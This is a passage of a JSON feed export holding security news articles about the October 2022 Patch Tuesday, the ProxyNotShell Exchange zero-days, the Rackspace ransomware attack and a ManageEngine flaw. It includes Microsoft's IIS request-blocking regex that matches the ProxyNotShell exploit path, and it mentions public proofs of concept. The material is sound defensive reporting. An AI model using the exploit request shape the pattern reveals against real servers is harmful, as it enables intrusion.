Among them are a zero-day vulnerability that's being actively exploited, and another that hasn't been spotted in the wild yet.\n\nThe bad news is that the much-desired fix for the \"ProxyNotShell\" [Exchange vulnerabilities](<https://www.malwarebytes.com/blog/news/2022/09/two-new-exchange-zero-days-that-look-and-feel-like-proxyshell-part-2>) was not included.\n\n## What was fixed\n\nA widely accepted [definition for a zero-day](<https://en.wikipedia.org/wiki/Zero-day_\\(computing\\)>) is a computer-software vulnerability previously unknown to those who should be interested in its mitigation, such as the software vendor. Until the vulnerability is mitigated, hackers can exploit it to adversely affect programs, data, computers or a network.\n\nAs such, a publicly known vulnerability is called a zero-day even if there is no known actively used exploitation for it.\n\nThe actively exploited vulnerability in this month's batch is [CVE-2022-41033](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41033>), a vulnerability with a [CVSS score](<https://www.malwarebytes.com/blog/news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities>) of 7.8 out of 10. This is described as a 'Windows COM+ Event System Service Elevation of Privileges (EoP)' vulnerability, which gives an attacker the potential to obtain SYSTEM privileges after successful exploitation.\n\nThis type of vulnerability usually comes into play once an attacker has gained an initial foothold on a system. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.\n\nAnother publicly disclosed vulnerability that gets a fix is [CVE-2022-41043](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41043>), a Microsoft Office Information Disclosure vulnerability. Affected products are Microsoft Office LTSC for Mac 2021 and Microsoft Office 2019 for Mac. 
Microsoft says attackers could use this vulnerability to gain access to users' authentication tokens.\n\n## What wasn't fixed\n\nThe Exchange Server \"ProxyNotShell\" vulnerabilities, [CVE-2022-41040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41040>) and [CVE-2022-41082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082>), were not fixed in this round of updates. One is a Server-Side Request Forgery (SSRF) vulnerability and the other a remote code execution (RCE) vulnerability that exists when PowerShell is accessible to the attacker. The two can be chained together into an attack.\n\nMicrosoft says it will release updates for these vulnerabilities when they are ready. In the meantime, you should read [this blog post](<https://techcommunity.microsoft.com/t5/exchange-team-blog/customer-guidance-for-reported-zero-day-vulnerabilities-in/ba-p/3641494>) to learn about mitigations for those vulnerabilities.\n\n## Other vendors\n\nOther vendors have synchronized their periodic updates with Microsoft. 
Here are a few major ones:\n\n * Adobe released [security updates](<Adobe%20also%20released%20security%20updates%20to%20fix%2029%20vulnerabilities>) to fix 29 vulnerabilities in several products.\n * Apple published [iOS 16.0.3](<https://support.apple.com/en-us/HT213480>).\n * Fortinet released important [security updates](<https://www.bleepingcomputer.com/news/security/fortinet-warns-admins-to-patch-critical-auth-bypass-bug-immediately/>).\n * Google patched several vulnerabilities for [Android](<https://www.malwarebytes.com/blog/news/2022/10/vulnerabilities-in-google-android-could-allow-for-arbitrary-code-execution>).\n * Samsung has started rolling out October 2022 [security updates](<https://androidstories.com/2022/10/12/samsung-2022-security-update-rolling-out-for-these-galaxy-phones/>) for some of its devices.\n * SAP has released [updates](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>) for several of its products.\n * VMware published security advisory [VMSA-2022-0025](<https://www.vmware.com/security/advisories/VMSA-2022-0025.html>).\n * Xiaomi released the October 2022 [Security Patch Update tracker](<https://xiaomiui.net/xiaomi-october-2022-security-patch-update-tracker-36308/>).\n\nThat should be enough to keep you busy, get patching!", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-12T17:45:00", "type": "malwarebytes", "title": "Update now! 
October patch Tuesday fixes actively used zero-day...but not the one you expected", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41033", "CVE-2022-41040", "CVE-2022-41043", "CVE-2022-41082"], "modified": "2022-10-12T17:45:00", "id": "MALWAREBYTES:A165959E3A462AF8315F01F1020BBF53", "href": "https://www.malwarebytes.com/blog/news/2022/10/update-now-october-patch-tuesday-fixes-actively-used-zero-day", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-08T16:24:17", "description": "It's not been a great week for cloud computing service provider Rackspace.\n\nOn December 2, customers began experiencing problems connecting and logging into their Exchange environments. Rackspace started [investigating](<https://status.apps.rackspace.com/index/viewincidents?group=2>) and discovered an issue that affected its Hosted Exchange environments. \n\nNow Rackspace has announced it was actually a ransomware incident that caused the service disruptions.\n\nWhile the investigation is ongoing, there are no details known about which ransomware is at play or how the threat actor gained initial access. In a [press release](<https://www.rackspace.com/newsroom/rackspace-technology-hosted-exchange-environment-update>) Rackspace said that the incident was isolated to its Hosted Exchange business. Rackspace has not shown up on any of the known leak sites that ransomware groups use to apply extra pressure on their victims, but this could also be due to the fact that there are ongoing negotiations.\n\n## Hosted Exchange\n\nRackspace's Hosted Exchange customers are mostly small to medium-sized businesses that don't have the need or staff to run a dedicated on-premises Exchange server. 
The outage still affects all services in its Hosted Exchange environment, including MAPI/RPC, POP, IMAP, SMTP, and ActiveSync, as well as the Outlook Web Access (OWA) interface that provides access to online email management.\n\n## Workaround\n\nRackspace said it will help affected customers implement a temporary forwarding while the disruption is ongoing:\n\n> "As a temporary solution while you set up Microsoft 365, it is possible to also implement a forwarding option that will allow mail destined for a Hosted Exchange user to be routed to an external email address. Please log in to your customer account for a ticket with instructions to request this option. Customers should reply to the ticket to request the forwarding rule be put into place for each of their users."\n\n## Impact\n\nIn an [8-K SEC filing](<https://www.sec.gov/ix?doc=/Archives/edgar/data/0001810019/000119312522298940/d388117d8k.htm>) Rackspace states that it expects a loss of revenue due to the ransomware attack's impact on its $30 million Hosted Exchange business. An 8-K form is required to report any events concerning a company that could be of importance to the shareholders of that company or the Securities and Exchange Commission (SEC).\n\n## The attack vector\n\nOne possible attack vector was [pointed out by security researcher Kevin Beaumont](<https://doublepulsar.com/rackspace-cloud-office-suffers-security-breach-958e6c755d7f>). It might be due to exploitation of the Microsoft Exchange vulnerabilities tracked as [CVE-2022-41040 and CVE-2022-41082](<https://www.malwarebytes.com/blog/news/2022/09/two-new-exchange-zero-days-that-look-and-feel-like-proxyshell-part-2>), known as ProxyNotShell.\n\nBeaumont found a Rackspace Exchange server cluster--currently offline--was running a build number from August 2022 a few days prior to the incident disclosure. 
Since the ProxyNotShell vulnerabilities were only fixed in November, it's possible that threat actors exploited the flaws to breach Rackspace servers.\n\nOne important conclusion Beaumont notes in his post is:\n\n> "For a [managed service provider (MSP)](<https://www.malwarebytes.com/partners/managed-service-providers>) running a shared cluster, such as Hosted Exchange, it means that one compromised account of one customer will compromise the entire hosted cluster."\n\nThis is what may have happened at Rackspace. Don't let it happen to you.\n\n* * *\n\n**We don't just report on threats--we remove them**\n\nCybersecurity risks should never spread beyond a headline. Keep threats off your devices by [downloading Malwarebytes today](<https://www.malwarebytes.com/for-home>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-08T12:00:00", "type": "malwarebytes", "title": "Rackspace confirms it suffered a ransomware attack", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-12-08T12:00:00", "id": "MALWAREBYTES:B0C4B025BF22D777A196390CAE7FC07F", "href": "https://www.malwarebytes.com/blog/news/2022/12/rackspace-confirms-it-suffered-a-ransomware-attack", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-05T00:04:37", "description": "Microsoft has issued some [customer guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as it investigates (yes, more) reported vulnerabilities in Microsoft Exchange Server, affecting the 
2013, 2016, and 2019 versions of the software. The company says it \"is aware of limited targeted attacks using the two vulnerabilities to get into users' systems.\" The move follows discussion online about whether two new Exchange [zero-days](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) are really new vulnerabilities, or just [new exploits for known vulnerabilities](<https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>).\n\nSo, let's start with the most important part: What should you do if you're tasked with administering an Exchange Server? Microsoft is working on an accelerated timeline to release a fix. In the meantime it's providing mitigations and detection guidance:\n\nMicrosoft Exchange Online Customers do not need to take any action.\n\n## Update October 4, 2022\n\nMicrosoft has [adapted the mitigation advice](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) it provided originally to block attacks on these vulnerabilities, because they were too easy to circumvent. The most significant change is the recommendation for Exchange Server customers to disable remote PowerShell access for non-admin users in your organization. Guidance on how to do this for a single user or multiple users is [here](<https://learn.microsoft.com/en-us/powershell/exchange/control-remote-powershell-access-to-exchange-servers?view=exchange-ps%22%20\\\\l%20%22use-the-exchange-management-shell-to-enable-or-disable-remote-powershell-access-for-a-user>). Microsoft also removed the option to block the ports that are used for Remote PowerShell, but doesn't mention this in the updates section.\n\nSome experts are promoting a more effective string to use in the Request Blocking instructions as shown under points 7 and 8 below. 
The change is minimal, but should be a significant improvement.\n\n`.*autodiscover\\.json.*Powershell.*`\n\nThese were the original instructions:\n\nUsers of the on-premises product should add a blocking rule in IIS Manager to block the known attack patterns. According to Microsoft, the following URL Rewrite instructions, which are currently being discussed publicly, are successful in breaking current attack chains:\n\n 1. Open the IIS Manager.\n 2. Expand the Default Web Site.\n 3. Select Autodiscover.\n 4. In the Feature View, click URL Rewrite.\n 5. In the Actions pane on the right-hand side, click Add Rules. \n 6. Select Request Blocking and click OK.\n 7. Add String `.*autodiscover\\.json.*\\@.*Powershell.*` and click OK.\n 8. Expand the rule and select the rule with the Pattern `.*autodiscover\\.json.*\\@.*Powershell.*` and click Edit under Conditions.\n 9. Change the condition input from {URL} to {REQUEST_URI}\n\nThe instructions above can be found on the [Microsoft blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>), with screenshots. It adds that there is no known impact to Exchange functionality if the URL Rewrite module is installed as recommended.\n\nAnother option is to block the ports that are used for Remote PowerShell--**HTTP: 5985** and **HTTPS: 5986**.\n\n## The vulnerabilities\n\nThe vulnerabilities were discovered by [GTSC](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) while performing security monitoring and incident response services. It was able to assess that the attacks were based on exploit requests with the same format as ProxyShell. 
But the servers being attacked had all the latest updates, including those that stop ProxyShell.\n\nThe attacks were used to drop web shells on the Exchange servers--a script that can be used by an attacker to run remote commands and maintain persistent access on an already compromised computer.\n\nAccording to security researcher [Kevin Beaumont](<https://twitter.com/GossiTheDog/status/1575580072961982464>) a significant number of Exchange servers have been backdoored. But he adds that this is not unusual, since the patching process is apparently such a mess that people end up on old Content Updates and don't patch ProxyShell properly.\n\nOn his blog on the subject he points out that if you don't run Microsoft Exchange on-premises, and don't have Outlook Web App (OWA) facing the internet, you are not impacted either. In addition, Microsoft also notes that attackers need authenticated access to the vulnerable Exchange Server in order to exploit either of the two vulnerabilities associated with these attacks.\n\nThe vulnerabilities, which are chained together, are:\n\n[CVE-2022-41040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41040>), a Server-Side Request Forgery (SSRF) vulnerability. 
SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make requests to other services within an organization's infrastructure.\n\n[CVE-2022-41082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082>), a vulnerability that allows remote code execution (RCE) when PowerShell is accessible to the attacker.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T13:00:00", "type": "malwarebytes", "title": "[updated]Two new Exchange Server zero-days in the wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T13:00:00", "id": "MALWAREBYTES:DDF3883C3A8B9A70629872FE83522C17", "href": "https://www.malwarebytes.com/blog/news/2022/09/two-new-exchange-zero-days-that-look-and-feel-like-proxyshell-part-2", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-28T00:05:01", "description": "CISA (the Cybersecurity and Infrastructure Security Agency) recently added **[CVE-2022-35405--](<https://nvd.nist.gov/vuln/detail/CVE-2022-35405>)**a remote code execution (RCE) vulnerability affecting Zoho ManageEngine PAM360 (versions 5500 and earlier), Password Manager Pro (versions 12100 and earlier), and Access Manager Plus (versions 4302 and earlier)--to its [Known Exploited Vulnerabilities (KEV) Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), a list of known CVEs that carry significant risk to the federal enterprise. 
Doing this forces all Federal Civilian Executive Branch Agencies (FCEB) to patch this bug.\n\n[According to BleepingComputer](<https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-manageengine-rce-bug-used-in-attacks/>), federal agencies that may be affected by CVE-2022-35405 have until October 13 to ensure they're patched and their networks are protected from attacks leveraging this vulnerability.\n\nCVE-2022-35405 is a critical vulnerability. When exploited, attackers can execute potentially malicious code on affected installations of ManageEngine software--without authentication for Password Manager Pro and PAM360, and with authentication for Access Manager Plus.\n\nResearcher Vinicius Pereira [first flagged](<https://www.bigous.me/2022/09/06/CVE-2022-35405.html>) this vulnerability in June 2022. Since then, several [PoCs (proofs of concept)](<https://xz.aliyun.com/t/11578>) and [a Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16852>) for it have been made public.\n\nManageEngine [\"strongly recommends\"](<https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html>) that its clients upgrade their affected software as soon as possible. 
The company pointed to the following locations where customers can download updates:\n\n * Access Manager Plus - <https://www.manageengine.com/privileged-session-management/upgradepack.html>\n * PAM360 - <https://www.manageengine.com/privileged-access-management/upgradepack.html>\n * Password Manager Pro - <https://www.manageengine.com/products/passwordmanagerpro/upgradepack.html>\n\nWhile private organizations don't have a ruling requiring them to patch noteworthy flaws, [CISA still urges](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/22/cisa-has-added-one-known-exploited-vulnerability-catalog>) them to patch as soon as they can.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-27T11:30:00", "type": "malwarebytes", "title": "Flaw in some ManageEngine apps is being actively exploited, says CISA", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-09-27T11:30:00", "id": "MALWAREBYTES:9446395F8878B21ADE37FDE8E05D9D37", "href": "https://www.malwarebytes.com/blog/news/2022/09/cisa-reveals-flaw-in-some-manageengine-apps-is-actively-exploited", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-10-12T08:05:16", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjB9Dk9_CtwU0e7o73L8Ctcukw86W5iQ5ovoTM1kBO_tiERjq84jxpKHzqShkuM1aMl6Au7sULjY1iTAtzw5NrUSjNj_xsk0dB6JJO3CT8wIaRAnfzA86ZECd4CWN2tjWREiW3roAj-De9vCeIbdpMQGtJC0njmkr2-6-1DXvcz3yDBVBEmQ25saSok/s728-e100/windows.jpg>)\n\nMicrosoft's Patch Tuesday update for the month of October has addressed a total of [85 security 
vulnerabilities](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Oct>), including fixes for an actively exploited zero-day flaw in the wild.\n\nOf the 85 bugs, 15 are rated Critical, 69 are rated Important, and one is rated Moderate in severity. The update, however, does not include mitigations for the [actively exploited](<https://unit42.paloaltonetworks.com/proxynotshell-cve-2022-41040-cve-2022-41082/>) [ProxyNotShell](<https://thehackernews.com/2022/10/microsoft-issues-improved-mitigations.html>) flaws in [Exchange Server](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-october-2022-exchange-server-security-updates/ba-p/3646263>).\n\nThe [patches](<https://www.rapid7.com/blog/post/2022/10/11/patch-tuesday-october-2022/>) come alongside [updates to resolve 12 other flaws](<https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in the Chromium-based Edge browser that have been released since the beginning of the month.\n\nTopping the list of this month's patches is [CVE-2022-41033](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41033>) (CVSS score: 7.8), a privilege escalation vulnerability in Windows COM+ Event System Service. 
An anonymous researcher has been credited with reporting the issue.\n\n\"An attacker who successfully exploited this vulnerability could gain SYSTEM privileges,\" the company said in an advisory, cautioning that the shortcoming is being actively weaponized in real-world attacks.\n\nThe nature of the flaw also means that the issue is likely chained with other flaws to escalate privilege and carry out malicious actions on the infected host.\n\n\"This specific vulnerability is a local privilege escalation, which means that an attacker would already need to have code execution on a host to use this exploit,\" Kev Breen, director of cyber threat research at Immersive Labs, said.\n\nThree other elevation of privilege vulnerabilities of note relate to Windows Hyper-V ([CVE-2022-37979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37979>), CVSS score: 7.8), Active Directory Certificate Services ([CVE-2022-37976](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37976>), CVSS score: 8.8), and Azure Arc-enabled Kubernetes cluster Connect ([CVE-2022-37968](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37968>), CVSS score: 10.0).\n\nDespite the \"Exploitation Less Likely\" tag for CVE-2022-37968, Microsoft noted that a successful exploitation of the flaw could permit an \"unauthenticated user to elevate their privileges as cluster admins and potentially gain control over the Kubernetes cluster.\"\n\nElsewhere, [CVE-2022-41043](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41043>) (CVSS score: 3.3) \u2013 an information disclosure vulnerability in Microsoft Office \u2013 is listed as publicly known at the time of release. 
It could be exploited to leak user tokens and other potentially sensitive information, Microsoft said.\n\nAlso fixed by Redmond are eight privilege escalation flaws in Windows Kernel, 11 remote code execution bugs in Windows Point-to-Point Tunneling Protocol and SharePoint Server, and yet another elevation of privilege vulnerability in the Print Spooler module ([CVE-2022-38028](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38028>), CVSS score: 7.8).\n\nLastly, the Patch Tuesday update further addresses two more privilege escalation flaws in Windows Workstation Service ([CVE-2022-38034](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38034>), CVSS score: 4.3) and Server Service Remote Protocol ([CVE-2022-38045](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38045>), CVSS score: 8.8).\n\nWeb security company Akamai, which discovered the two shortcomings, [said](<https://www.akamai.com/blog/security-research/cold-hard-cache-bypassing-rpc-with-cache-abuse>) they \"take advantage of a design flaw that allows the bypass of [Microsoft [Remote Procedure Call](<https://learn.microsoft.com/en-us/windows/win32/rpc/rpc-start-page>)] security [callbacks](<https://learn.microsoft.com/en-us/windows/win32/rpc/callbacks>) through caching.\"\n\n### Software Patches from Other Vendors\n\nIn addition to Microsoft, security updates have also been released by several vendors to rectify dozens of vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [Android](<https://source.android.com/security/bulletin/2022-10-01>)\n * [Apache Projects](<https://news.apache.org/foundation/entry/the-apache-news-round-up276>)\n * [Apple](<https://support.apple.com/en-us/HT213480>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * 
[Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [CODESYS](<https://www.codesys.com/security/security-reports.html>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [F5](<https://support.f5.com/csp/new-updated-articles>)\n * [Fortinet](<https://www.fortiguard.com/psirt?date=10-2022>) (including an [actively exploited flaw](<https://thehackernews.com/2022/10/fortinet-warns-of-active-exploitation.html>))\n * [GitLab](<https://about.gitlab.com/releases/2022/10/03/gitlab-15-4-2-released/>)\n * [Google Chrome](<https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_11.html>)\n * [IBM](<https://www.ibm.com/blogs/psirt/>)\n * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/October-2022>)\n * [NVIDIA](<https://www.nvidia.com/en-us/security/>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/october-2022-bulletin.html>)\n * [Samba](<https://www.samba.org/samba/history/>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n * [Trend 
Micro](<https://success.trendmicro.com/dcx/s/vulnerability-response?language=en_US>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-12T07:07:00", "type": "thn", "title": "Microsoft Patch Tuesday Fixes New Windows Zero-Day; No Patch for Exchange Server Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-37968", "CVE-2022-37976", "CVE-2022-37979", "CVE-2022-38028", "CVE-2022-38034", "CVE-2022-38045", "CVE-2022-41033", "CVE-2022-41040", "CVE-2022-41043", "CVE-2022-41082"], "modified": "2022-10-12T07:07:54", "id": "THN:0521233945B9471C64D546BD2B006823", "href": "https://thehackernews.com/2022/10/microsoft-patch-tuesday-fixes-new.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-06T16:20:52", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiLG9V9B_xVvwA7aFCGySTOO5wtWjfUUfXnD668vDSJkbzBIm2NPP6g1ky-ViCG-wKLpXABQxIlv8utmjMKQL51hpJiXyYY2TLTY38wdOqX0wsX_F8diipfii3BtEeoyjJyWWMKayJerKNP8K8LA9mMdq2btrtQu479xoi3zF86AABjwbqGkg-1x_DY/s728-e100/ms.jpg>)\n\nMicrosoft on Friday disclosed that a single activity group in August 2022 achieved initial access and breached Exchange servers by chaining the [two newly disclosed zero-day 
flaws](<https://thehackernews.com/2022/09/microsoft-confirms-2-new-exchange-zero.html>) in a limited set of attacks aimed at less than 10 organizations globally.\n\n\"These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration,\" the Microsoft Threat Intelligence Center (MSTIC) [said](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) in a new analysis.\n\nThe weaponization of the vulnerabilities is expected to ramp up in the coming days, Microsoft further warned, as malicious actors co-opt the exploits into their toolkits, including deploying ransomware, due to the \"highly privileged access Exchange systems confer onto an attacker.\"\n\nThe tech giant attributed the ongoing attacks with medium confidence to a state-sponsored organization, adding it was already investigating these attacks when the Zero Day Initiative disclosed the flaws to Microsoft Security Response Center (MSRC) earlier last month on September 8-9, 2022.\n\nThe two vulnerabilities have been collectively dubbed [**ProxyNotShell**](<https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>), owing to the fact that \"it is the same path and SSRF/RCE pair\" as [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>) but with authentication, suggesting an incomplete patch.\n\nThe issues, which are strung together to achieve remote code execution, are listed below -\n\n * [**CVE-2022-41040**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) (CVSS score: 8.8) - Microsoft Exchange Server Elevation of Privilege Vulnerability\n * [**CVE-2022-41082**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) (CVSS score: 8.8) - Microsoft Exchange Server Remote Code Execution 
Vulnerability\n\n\"While these vulnerabilities require authentication, the authentication needed for exploitation can be that of a standard user,\" Microsoft said. \"Standard user credentials can be acquired via many different attacks, such as password spray or purchase via the cybercriminal economy.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjDHuP8RcawOweo1l6ugi9Ob9HAQv5FloiZoBENRZJT1OGy1-icUmXQvdS86HsNfrxOCd9PP7M0XaqOZf1bLcVGic0MzVny5fGJtRDkn9gJzNIkyRzbf0NI5KIZSFcJkY_K7_R4TE6PtOAWo3h_NhgHlKy4YxwtTGQVxWAPzI6FaEI3z9CMmjvAJYMUZA/s728-e100/ms.jpg>)\n\nThe vulnerabilities were [first discovered](<https://thehackernews.com/2022/09/warning-new-unpatched-microsoft.html>) by Vietnamese cybersecurity company GTSC as part of its incident response efforts for an unnamed customer in August 2022. A Chinese threat actor is suspected to be behind the intrusions.\n\nThe development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/30/cisa-adds-three-known-exploited-vulnerabilities-catalog>) the two Microsoft Exchange Server zero-day vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the patches by October 21, 2022.\n\nMicrosoft said that it's working on an \"accelerated timeline\" to release a fix for the shortcomings. 
It has also [published a script](<https://aka.ms/EOMTv2>) for the following URL Rewrite mitigation steps that it said is \"successful in breaking current attack chains\" -\n\n * Open IIS Manager\n * Select Default Web Site\n * In the Feature View, click URL Rewrite\n * In the Actions pane on the right-hand side, click Add Rule(s)\u2026 \n * Select Request Blocking and click OK\n * Add the string \".*autodiscover\\\\.json.*\\@.*Powershell.*\" (excluding quotes)\n * Select Regular Expression under Using\n * Select Abort Request under How to block and then click OK\n * Expand the rule and select the rule with the pattern .*autodiscover\\\\.json.*\\@.*Powershell.* and click Edit under Conditions.\n * Change the Condition input from {URL} to {REQUEST_URI}\n\nAs additional prevention measures, the company is urging companies to enforce multi-factor authentication (MFA), disable [legacy authentication](<https://learn.microsoft.com/en-us/azure/active-directory/conditional-access/block-legacy-authentication#moving-away-from-legacy-authentication>), and educate users about [not accepting](<https://thehackernews.com/2022/09/uber-claims-no-sensitive-data-exposed.html>) unexpected two-factor authentication (2FA) prompts.\n\n\"Microsoft Exchange is a juicy target for threat actors to exploit for two primary reasons,\" Travis Smith, vice president of malware threat research at Qualys, told The Hacker News.\n\n\"First, Exchange [...] being directly connected to the internet creates an attack surface which is accessible from anywhere in the world, drastically increasing its risk of being attacked. Secondly, Exchange is a mission critical function -- organizations can't just unplug or turn off email without severely impacting their business in a negative way.\"\n\n \n\n\nFound this article interesting? 
